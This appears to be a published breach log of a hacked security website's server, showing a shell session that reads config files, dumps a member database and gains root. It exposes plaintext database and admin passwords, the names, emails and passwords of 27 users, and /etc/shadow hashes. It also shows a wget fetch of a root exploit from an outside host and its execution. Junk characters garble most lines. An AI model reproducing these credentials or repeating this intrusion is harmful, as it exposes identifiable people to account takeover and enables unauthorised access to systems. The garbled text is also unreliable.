-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg' t: K P& l% f' Z- |* ?
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
/ a/ | ~9 a9 b; ^& vdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
1 [3 t! x1 X( V" F& M2 \8 X/ {" Z# J7 ydrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
R8 _' ^! _3 U0 r- i-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php) _5 H n3 I' ^, z Y
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
7 S& Z8 P2 ?2 ]3 T# O4 Kdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed$ F1 D2 Z% h7 K% k9 J
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
) A+ g* `# k5 b9 J, |-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
( P8 M! N, T4 U) ]1 e* Z: A' z-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess L7 c9 L4 T w' I3 U8 R
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php1 l7 _' e+ N. _7 b4 ?
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html4 t4 @" C. e% C. X+ r5 m4 [0 d
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php8 z' v0 N5 U, M% a$ o$ G
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
* C; C) ^4 H$ i+ U# e6 [' p-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
* h0 Z2 e4 O5 x: |+ v$ ?) ndrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
6 Z8 V: c: f9 A$ X V) gdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
# @, l( ?2 l! g6 B' c9 Mdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
8 _* i& t( o* y) ddrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
X8 ^5 X: ?6 j9 C6 s- ]0 J$ jdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
6 u) j$ C' W9 M6 |drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
; r* n# K4 l2 X& {6 ]* Edrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
, O" E& P% h) e- U, x-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
' X. U/ l: S- j$ udrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
g& U0 m* ^. p& J7 Z-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
1 f) j( y: _+ bdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss$ q- b' Z7 N5 d9 k8 {
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
# e5 o$ [, _7 G: kdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
5 o7 ^+ ]& P; w; k+ m4 w0 C" |drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes1 U+ D! y) T8 A8 p( R
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src( D) D; ?! j# N; l5 g1 K6 X
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
6 E4 ^1 g) I6 H3 [drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
) J2 m" d" Y1 gdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old2 F! U- k$ G0 J. F
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
' d8 N0 d) ]6 f/ d* F3 kdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki6 W5 R7 v: l- ~
9 p) i3 w; E1 Q
sh-3.2$ head -20 index.php( }' ]# R7 p: y3 _. x# m' `
<?PHP
2 \ a; a. y2 L- @$ R+ o1 |/**
* A+ `: c1 N4 e2 X% g, b% ^* Mainfile (external) for astalavistaNET v2.0
4 l4 v' n( v0 l; K' |" q*2 z% Q* _8 P6 y" r4 ^# L
* @copyright Astalavista IT Engineering GmbH
% ^3 h+ [+ D$ q% x0 a* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
! ^$ x# o( J1 v7 i1 t! F' l. ]* @version 1.0, k' E+ j. y* \! ]% d0 ]
*/- G% p4 _( i) H. G; A7 k
' ]6 U) b! |6 s' `3 _* D" M4 i, o% N2 L
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
& W3 {4 N5 o! R) b6 @& K $dontStartSession = false;
( z! P" E" d Q, v+ @ } else {2 i# `+ _3 D$ c$ S
$dontStartSession = true;8 {5 l8 `# c2 S
}, I4 h0 q! C- t8 _' U4 y
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);1 F& H* l }9 @( Y* Q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
$ b: N) `6 g3 V: a4 h" F require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
# S* |, v: @2 I require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);6 W( Q$ f/ d4 c! R t' S
7 v0 V# c8 G: h& Gsh-3.2$ cd config) T% X( J; n f/ W
sh-3.2$ ls -la
) k6 g4 j. C# C5 m. }' A: |total 32. j$ p; Y3 h2 o2 `. S9 \
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .' U8 d4 I0 S1 h) D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
- t! @3 k) p2 {: M-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php7 j \, |, k2 p
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php- ^* b7 S9 a' T+ W& V: `7 }* ^& B: T
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
9 \. w) S7 T0 M J; B-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
" a' s! {& e( Y" u3 ]! o0 u- j-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php, d( F, ~: `3 y: N
0 r7 L5 v4 I7 W5 U5 y, hsh-3.2$ cat com.conf.php
0 W6 m5 i4 h4 ~/ c, P[snip]. m6 h/ l, B+ k% l/ U: F& n" `- d
//member-database- `5 x7 L& h- L
$_CONFIG['db_mem_server'] = ‘localhost’;% l7 T. m1 m0 x7 n. G* O1 n) g
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
: e7 G" j- P& f$ B$_CONFIG['db_mem_user'] = ‘astanet_db’;
9 _8 Y& I# `+ J' Z1 U" k$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
* @4 ]5 h% B* \$_CONFIG['db_mem_debug'] = false; //true or false
: Y% [+ |# B: N+ `% q" k//ads-database* ], M* m) k" J8 D9 A+ L
$_CONFIG['db_ads_server'] = ‘localhost’;
o4 d: u! c3 F0 b3 ^/ l; }" J$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 t. J2 O/ @* H" s9 W0 L2 U
$_CONFIG['db_ads_user'] = ‘astanet_db’;; j% t$ k0 ^$ ^0 K) L
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;4 }+ |; F% n- ?2 x' s" M2 B/ ~/ h
$_CONFIG['db_ads_debug'] = false; //true or false! r* k& P5 ^( `0 Y2 T* X; G
//rainbow-database$ l: I+ O% p q
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
1 V+ P2 e4 E4 k8 _7 Y$_CONFIG['db_rainbow_database'] = ‘rainbow’;6 j( S- u/ U. I- u5 m& ], H
$_CONFIG['db_rainbow_user'] = ‘dinu’;
( l/ H/ M9 A, c ^8 n2 B' I$_CONFIG['db_rainbow_password'] = ‘dinudinu’;# n( V( @3 Y- e- ?) C: T
$_CONFIG['db_rainbow_debug'] = false; //true or false
9 n7 |. U% b, [- B9 R! \1 \//mailing lists database! [4 k% Q. U6 F0 L
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
, u" I5 ~; O8 B* n& p" E& o5 }1 G$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;+ {0 V$ o4 X) H a7 o- E
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
" B& Q, X9 B3 f$ Y$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
/ x6 u) y4 T* `3 ^5 q+ h$_CONFIG['db_mailing_lists_debug'] = false; //true or false( T( J) I! m& o7 ~- }; D
//paypal
1 O" r, }, z% V- C1 I$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
$ h. S9 s9 K$ a0 v- O) {$_CONFIG['sub_pp_cmd'] = ‘_xclick’;7 g; c) d- Y2 z2 ]) t
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;! k( v9 l4 U/ S( Z
$_CONFIG['sub_pp_noship'] = ‘1′;, u7 i9 m! U& \+ u( ~( o8 g2 t& E
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
] m: S1 v$ c7 \! k- _1 s[snip]4 q$ H6 l. G% `- \+ D6 ]$ L
+ B |9 _, {/ f! g4 z& {5 N6 Y
sh-3.2$ cd ..! [/ ]6 \ C% b7 s# F R+ z
sh-3.2$ cd member# q- w! W# u, @3 W: ?# x* Q& S
sh-3.2$ ls -la
5 P2 q/ |" l+ K4 c2 o! }total 20! Y3 i1 z' ]8 W& \+ T
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .& Q8 T& W- e5 B; `
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... k$ e, C" K7 w! `1 A
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
, R* a$ z$ `2 K' {; f# T8 B' q-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
* B8 x3 {5 N( }1 c" ^, I- P9 v2 Ish-3.2$ cat .htaccess
; G$ ?+ B8 e K, _! @1 r W+ c3 J( LSecFilterEngine off5 k/ l b0 r; i. H+ P$ Q
3 C2 Y; s4 o' N) Y5 B9 t9 Ash-3.2$ cd ..3 p3 K' u E, i s; V) E, R4 U
sh-3.2$ cd cron% m1 b! E% o. v6 ]- Z
sh-3.2$ ls -la+ j" n: J+ @' j4 U4 j
total 1681 m9 H4 t/ d! }4 `
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
% n6 I' Y- T% wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 [! t- _ c& Q* i
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
( m6 @! w3 [ C7 u1 D0 k-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
2 S4 E3 C D! S3 A; U-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
R& e/ k+ v( E) h-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
# @- n0 Z9 x* m$ C4 M-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
* y. |% W. R/ b2 m-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
- O3 Q, N1 R, o4 n5 y1 K1 v-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
1 K: z% c/ l7 M i-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
( O8 w5 q$ w4 p4 [3 L) d4 f7 t+ P-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh* Y. G9 S, j5 x0 V6 k: b& M Y, }) c
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
, g" Y) X9 L& _" |* q-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
0 a+ u# Y+ b. U2 G8 g5 |-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
# D$ ]+ i6 Q7 K. [$ H-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh3 n9 }& Q. n& R; y: X) Y
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php) B- S7 x$ R! e' B' P
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php3 u0 Q4 o4 }# J5 Z
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php4 n3 F! s! \8 ^: e3 T: o* ?6 z; n
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
3 u; b; g; n, R/ |-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php/ j0 ^4 p7 Y! o8 E1 ~' d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email- K9 B6 ]0 W+ H1 u7 _0 I' E: n$ k
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php f+ G7 F6 l% H! O+ P: [
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
- f3 D$ L: x9 |
5 J3 Z& x7 g" v K9 Qsh-3.2$ cd ..
$ f' s; ?- y/ m0 V9 zsh-3.2$ cd _007
2 E9 j# ~+ F0 I+ W: dsh-3.2$ ls -la4 A! ~' |- m5 C: p9 @
total 24
. F! ?) M7 p/ j6 F9 V* T8 cdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .5 U" {& |0 N* H- J o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... G6 @4 y' x8 \ V
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess! P! R4 g% d. R( }5 N
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php @7 x y4 B0 T) x' o
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
2 C1 n2 n" w6 U- tdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
2 m2 I& U b6 X9 D% l, J1 z& b+ a$ a" t E0 Z) K% o
sh-3.2$ cat .htaccess
0 A* k, O x' j3 ]% qauthType Basic0 H2 |2 e5 O6 y
authName Admin& s' L3 H; {* O- y
authUserFile /home/astanet/auth/.htadm_pwd
h( _; A# X* {$ m/ Wrequire valid-user
4 |+ a5 p; W: i$ Y8 R
1 ~4 E7 [ }& O& w. e( ^3 hsh-3.2$ cat /home/astanet/auth/.htadm_pwd
- m& _' V& J0 i- _! Ladmin2net:CR0bl65MwhfT
8 P, J5 L; J; M6 z' o: ?1 W1 K: u0 m {4 z4 ~) _
sh-3.2$ mysql -u astanet_db -p3 o8 y3 o9 ?! R: w; s; {0 [- r5 t4 y
Enter password:
9 p. [* l. N$ o x, l6 }1 IWelcome to the MySQL monitor. Commands end with ; or \g.$ a r" c4 C ~6 i% ^
Your MySQL connection id is 2751537 F: J0 H5 C5 @* R' B) v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
5 S$ @0 r- @2 C2 p6 q
6 ]% h V, I" [; T- q. r% ^Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* Z7 K' Y3 F6 G$ W* S5 J
) X2 W' @) d$ W+ z) @: N
mysql> show databases;
4 s$ E% [9 q6 y; Z+ P$ A+———————–+
& |* }& ~7 h: B: ^| Database |1 G) G9 C: F* u& d
+———————–+
0 w" k) D, I/ @) t2 B2 s' t7 I' x| information_schema |
# Q; {* X) a4 K' x| astanet_ads |
( W/ g4 F( G5 _6 L% M' ?| astanet_mailing_lists |6 n F4 l0 @% S9 W7 @) `' j: J" u
| astanet_mediawiki |
4 l- {, w/ w, V5 p) w* f| astanet_membersystem |
^" S8 s- D. }' W' d2 b| test |; a* R* k- R& J% Q! |& E
+———————–+
4 z5 G" l% i7 I+ o6 rows in set (0.00 sec)
+ D( v |2 G1 x3 y, M8 L: y8 F- [* s) e6 g! ]2 a
mysql> use astanet_membersystem0 e* S6 @9 i1 s4 n. x; e
Database changed
9 A* I- ~2 J% `! i4 n- xmysql> show tables;* F& N2 ] H1 Y0 T
+———————————–+% s% U1 G0 T* a
| Tables_in_astanet_membersystem |
7 a+ d7 f& t% B' ~) L+———————————–+- |2 C% W* e k& p. \ R
| blacklist_categories |3 k" [" S [$ ?( Y" |3 A/ Y" c
| blacklist_content |* |- x" q1 ?+ l7 d) A* T$ M4 U& c% c
| blacklist_levels |$ p/ i* F) i& u {- U$ u) X5 Q
| blacklist_mcset |
1 U! u# a# o3 F" O% k3 g3 ^| dir_categories |
8 u f" t9 k; m| dir_comments |' _# S2 ` H) M# Z* M+ W
| dir_links |; Q Z' z0 [. I0 h6 `! {
| dir_temp |
! D/ y, c% L' @4 L| dir_votes |
3 v. K% K) x" ^! D1 p| documents |
, x1 J' |5 h V) r( @" D; v% {% o5 t| documents_categories | z4 }2 g4 P/ d. c
| email_content |# L4 G3 E4 o/ \7 A9 i, y; w W* J
| email_settings |
4 s4 u& A) R0 |3 ~| exploits |2 h. L3 y- S/ m- D
| exploits_categories |
! ~3 D- N: [5 _| exploittree_categories |+ s# l/ n/ D% a# o4 @3 s- G& j
| exploittree_exploits |
& u; E3 s; Y# K" [| home_values |: k0 F6 Q' [* t5 B- M
| iso_countries |. H" w: _; R" {0 L9 M, L
| links_categories |
2 Y* w% y6 H! t g# y7 |9 d3 f| links_records |" L/ \3 n% `& Y; x1 R2 P
| links_unauth |' H. S" i& }" a
| links_votes |7 }* {- q2 M- ]8 o k
| log |
8 O- r7 H: v2 H3 D| news_categories |
- S4 O$ n k" P7 v' |/ g4 F| news_comments |
6 ?5 E5 }! l' z& U1 f8 U6 ]$ i$ @| news_emoticons |2 f( s) F6 P1 W3 \3 h6 M
| news_latest |* a9 o1 O5 z# \9 [/ A! A! q; `' X
| news_messages |7 g6 o n4 [% ~+ z2 C( T
| news_statistics |& o: e) M, s {8 Q }4 [/ ~ H( G
| news_votes |
# T5 [5 d$ |. H: M1 X9 H| prices_content |+ j3 j9 o4 r) `, W% Q
| prices_offers |& [4 u; ^( _* G
| rss_settings |! O$ u5 ]- |/ Y5 m- J
| sessions |
! r1 }# z3 i$ C+ r4 C+ W- c9 H) q+ J| stats_signups |5 c. F9 {5 ?5 E+ b
| u2u2 |& M* N% B9 a, V3 _1 y, J6 [
| u2u_contact |
/ i- r, ?- b/ K) O0 n/ r| u2u_settings |
( O. L. j7 r$ e! ^2 G C/ e" I| user_keywords_selected_categories |
) m% P/ V+ e/ J7 [/ A+ }| users |" y% S0 O% ?, w' b& K1 D2 U/ u
| users_ipn_test |
! ^( j# g# G5 j5 L: P0 A) W' E| users_keyword_values |& A0 U ?6 o, T4 Z* {: \- _
| users_profile |
& `/ m+ D/ G2 m* p! r# x# n| users_temp |$ n* O5 l: Y& H5 c( A: }+ t8 L
| users_upgrade |
4 n, w$ Z, d% @5 ], ?6 | Y" J0 p+———————————–+/ g9 I( f! O8 O+ P# U/ p9 _$ w7 z
46 rows in set (0.00 sec)
" ?! S4 R8 H# O8 V
" T7 e3 y$ I( @! a9 O9 U+ r8 e& Smysql> describe users;3 O8 n) V& k9 M! c+ S( T
+————————–+————————————–+——+—–+———————+—————-+: b0 A; g: O; Q% @+ ?
| Field | Type | Null | Key | Default | Extra |
( g* v9 L2 ^( F- d5 M+————————–+————————————–+——+—–+———————+—————-+
/ |# v5 Q3 {! ?& @ l5 R| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
+ {- k/ d8 M0 K5 N/ |$ A4 Q1 ]| user | varchar(50) | NO | | | |1 ]6 W/ C9 Q6 i
| nickname | varchar(30) | NO | MUL | anonymous | |$ M7 L ]: B Q' X( C2 H. L
| password | varchar(30) | NO | | | |
$ `$ V w5 p2 o" b u, V! d f| userlevel | tinyint(3) | YES | MUL | NULL | |- I, u3 u8 a9 D8 z* z7 U2 D9 Q+ {
| exp | int(8) unsigned | NO | | 0 | |5 [$ R4 L3 ?7 C
| email | varchar(50) | NO | | | |- E7 _0 f% ^: g
| ip | varchar(15) | NO | | 0 | |, z. C9 Q5 `# F
| proxy | set(’0′,’1′) | NO | | 0 | |, F0 I7 V0 T0 O6 ]" Z ?, C9 _) x- F& L
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
! V9 M5 N5 L, S z" v| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |# T# @; l9 F0 s6 `5 G" f
| anz_in | tinyint(1) | NO | | -1 | |: T: k8 E, `7 u
| status | tinyint(1) unsigned | NO | | 0 | |
) [+ c H; m6 Y| checked | set(’0′,’1′,’2′) | NO | | 0 | |' p% o$ g" _& `# E; `
| freemember | set(’0′,’1′) | NO | | 0 | |
& p1 ]; M) ~6 i& N: G, e- L| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
6 S% l) D- {) _9 ]3 G+ [! k- S2 C; W| lang | tinytext | NO | | | |
?7 K- c* ?' I. V; a| adid | smallint(6) | NO | | 0 | |+ ~: ~# h' r8 {5 r7 `$ B# [
| pp_txn_id | varchar(255) | YES | | NULL | |
( _) Q1 X! P. V| cnb_transaction_id | varchar(255) | YES | | NULL | | |$ T4 I, c" [5 q
| cnb_order_id | varchar(255) | YES | | NULL | |
, x' q, A# B- _2 L, p: f2 v| cnb_user_id | int(11) | YES | | 0 | |( ^; j# ? _2 d% v# }: @% k& I/ Q
+————————–+————————————–+——+—–+———————+—————-+
* n" p! k- l1 l, \: R4 _22 rows in set (0.01 sec)% A4 Z2 r9 h0 l: T) m( }+ y; o
" T% L) g' ?( ^ Y v
mysql> select count(*) as skids from users;
& h+ x( ], z$ T, I+——-+
& ~* A3 f% z+ A| skids |
5 I. \; @* [5 h3 Q/ g( o- I! L+——-+/ q% t" k4 y# B. S" X" S8 I9 X
| 25199 |- `# L9 E) Q2 P8 O
+——-+
* `- t- q7 b; w# L1 row in set (0.00 sec); g* \* ^8 s$ Z
8 r6 } t) k+ o) j$ R- R
mysql> select user,nickname,password,email from users where userlevel = 1;
) u: Y. `3 R. x& a+————————–+———————-+——————+———————————–+
! z* x- i# b+ P0 l, R| user | nickname | password | email |
4 V* R$ ?( _+ ]9 c& c: N+————————–+———————-+——————+———————————–+
2 n9 [* t9 u' |0 N! Q3 T1 d2 v4 i| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
/ f# z/ r# a5 J9 S. x6 g+ z. Q6 r& S| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
- \$ x" X9 `. x% W8 `| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
- n ]; c& F: p* | o# {) c/ \1 I| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
8 R2 H0 L* f3 n; L7 j| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |9 l: y7 g7 L# j% B, |
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
4 i: o, m9 X F| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
( J% Z) i) `6 `& o| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
2 F# n- K" s) e3 O8 |7 N| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
: d0 s) k8 E) h| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
, e ~; }/ x# @| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |2 ], F$ I# u4 I
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
' z! M" C% f: r' H% g" [| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
1 X" v: t6 w) f0 s| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |: ^) G, M, t7 g$ y) z& u
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
. v' X! y8 ?' _% F' |+ R* t+ l| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |. w( B0 k, H6 j @6 g4 a
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch | k# @9 z& c( S# K Z1 Y
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
9 }0 n$ f7 I, s- w. g| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |# D l+ P1 f: _3 N# q. f( v
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
) f" H! O; c8 I4 o5 k5 v# e| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |: r" `$ f6 [ Q2 I- h
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
' m; f9 I$ c; O U& u| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |' |+ C$ f$ R0 R; l
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
3 ]4 ^& @) w7 `( n3 H. M/ w| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |6 T& J. A# ~0 R! w, Q. k
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |% m2 V) C5 A& h* O: g
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |" U: L; d9 V: m
+————————–+———————-+——————+———————————–+
3 j- `7 s* J1 y5 F% D3 x& T27 rows in set (0.00 sec)
G; m# O# j4 h" d# x
$ }/ G) z3 H- `$ j; Ymysql> exit;
; ]$ A S- [9 VBye7 w/ y. F. S! k% j* d) F/ |8 c
7 Y0 K8 n3 O, ~, C+ D# B3 d' ~[~] plaintext passwords? yes," j$ b7 {8 ?# A# b" m7 H F! Y
Those so called “security professionals” who charge you $6.66 / month to$ N" J6 e& b, j4 i7 p: D5 o
register at their hack-proof portal, save your passwords in plaintext…
$ x4 s1 _. \; t0 \' A5 Nbrilliant!
5 ?+ _/ A% ^. W& a( L# v" k6 \
0 p8 b0 V Q( v$ ]7 _[~] This been fun but we want more.
* y; ^! u" S/ S1 C+ @! L+ M3 \9 C' \1 x; t0 I) ]& ^" X
sh-3.2$ uname -a- h8 A! ~9 j% `' j: ^
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% s. s1 t' K7 x4 qsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url] V* j5 S! Y8 ]: L& O( b& S
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]7 D, W9 B% X6 O
Resolving anti.sec.labs… 13.33.33.37
/ @' C; a4 S1 D9 X9 R+ QConnecting to anti.sec.labs|13.33.33.37|:80… connected.1 C$ ~) j9 B* o* l$ y& c) |
HTTP request sent, awaiting response… 200 OK
u5 ~4 n! n8 u9 B8 n; z% K: qLength: 18200 (18K) [text/plain]# H# W, A( I7 g0 y U0 E
Saving to: `g0troot’! I* N! c7 O1 _5 M7 @9 I
- ]% }8 H7 w5 |& x
100%[=========================================================================================================================================>] 18,200 58.6K/s in
% H4 Y' z; w; R' a3 ?0.3s
3 |" @' l+ t" s; _8 E) R, P0 l) N
2 v. Q1 F. `9 K18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]- I& E/ b2 [- G0 k# ~0 _
" E9 {- t- {% {9 I' r
sh-3.2$ ./g0troot -i x86_64
. x9 g& E, R& J+ b. @# |[+] g0troot - anti.sec.labs v9 @7 F) y6 P- n6 \) t
[+] Target: 2.6.18-128.1.10.el5
2 H. J! {# A0 a; i, j6 B2 W; J[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
/ ]" f/ y1 q. s; t
3 r4 z. B H4 D# M4 c[+] r00tr00t( m0 I; F, ~# P9 p, C9 q* a) f: G7 @, [
[~] Executing shell…# V' h; P G9 u" i, M7 J0 O# T
" _/ M2 y; z5 j. n
sh-3.2# id
0 r2 W, d: ~# Q- ]" q6 Juid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)) ^' S8 M) G, h5 c4 F
, \) a1 W( M+ v* G
sh-3.2# cat /etc/shadow
P8 t! h" [; R6 _4 e& proot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
' u5 r/ z* L7 @6 {: L6 |[snip]
! X6 a$ P+ j* h# u. Vadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
$ V4 J- @# S" E; W/ b( ijon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
5 a* B2 f ]5 s {5 m7 Tcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::# R: e. ?, y7 ^* e9 Z: i
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
9 Z8 ~5 ?' W( s! }; J6 o
9 s9 T$ Z$ r' f" psh-3.2# cat /etc/motd2 c9 Y3 |( F; Y) P* D5 C- q$ G) m( b7 s
#####################################################
$ }% b+ R6 B+ S$ w#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
) {( a/ V. ]$ Q# |__| [__ | |__| | |__| | | | [__ | |__| #% C* O# K$ j s, p5 U
# | | ___] | | | |___ | | \/ | ___] | | | #. u, l* i" }7 K0 E0 ^ `
# #- q/ s3 X- ~: P0 F" [2 A1 T
#####################################################
" @! f6 [& Q5 t* A: y( E J# #
